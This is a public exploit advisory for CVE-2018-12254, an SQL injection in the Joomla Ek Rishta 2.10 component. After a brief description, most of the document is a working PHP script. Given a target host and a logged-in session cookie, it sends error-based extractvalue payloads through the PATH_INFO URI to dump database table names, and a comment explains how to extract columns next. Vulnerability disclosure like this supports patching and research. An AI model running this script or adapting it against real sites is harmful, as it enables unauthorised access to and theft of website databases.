Joomla Ek Rishta 2.10 SQL Injection

`# Title: SQL Injection Joomla Component Ek rishta 2.10 - SQL Injection  
# Date: 2018-06-14  
# Exploit Author: Guilherme Assmann  
# Vendor Homepage:https://www.joomla.org/  
# Version: 2.10  
# Tested on: MacOSX, Safari, Chrome  
# Download: https://extensions.joomla.org/extension/ek-rishta/  
# CVE: CVE-2018-12254  
  
# Vulnerability Description  
# To exploit this vulnerability, the user must be logged on to the platform!  
# the vulnerability allows SQL Injection via the  
# PATH_INFO to a home/requested_user/Sent%20interest/[username] URI.  
# more information(en):   
# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/  
# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/  
# more information: https://desecsecurity.com/  
# exploit code to dump tables:  
  
<?php  
  
// CVE-2018-12254  
  
// after dump the tables, use %60%23table_name%60 to dump columns...  
  
$host = $argv[1];  
$cookie = $argv[2];  
  
// Usage: php exploit.php [http://[HOST]/](http://[host]/) aCookie: foo=bara  
function exploit($host,$ck){  
$urls = sqli();  
$ch = curl_init();  
foreach($urls as $url){  
curl_setopt($ch,CURLOPT_URL,$host.$url);  
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);  
curl_setopt($ch,CURLOPT_USERAGENT,":)");  
curl_setopt($ch,CURLOPT_HTTPHEADER, [$ck]);  
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,100);  
curl_setopt($ch,CURLOPT_TIMEOUT,100);  
$response = curl_exec($ch);  
$s = strpos($response,"#__");  
echo substr($response,$s,30)."\n";  
}  
}  
function sqli(){  
$uri = "/index.php/home/requested_user/Sent%20interest/1'or%20";  
for($i=0;$i<100;$i++){  
$value = $i+1;  
$data[$i] = $uri.str_replace("+","%20",urlencode('extractvalue(0xa,concat(0xa,(select table_name from information_schema.tables where table_schema=database() limit '.$value.',1))) #'));  
}  
return $data;  
}  
exploit($host,$cookie);  
?>  
  
  
`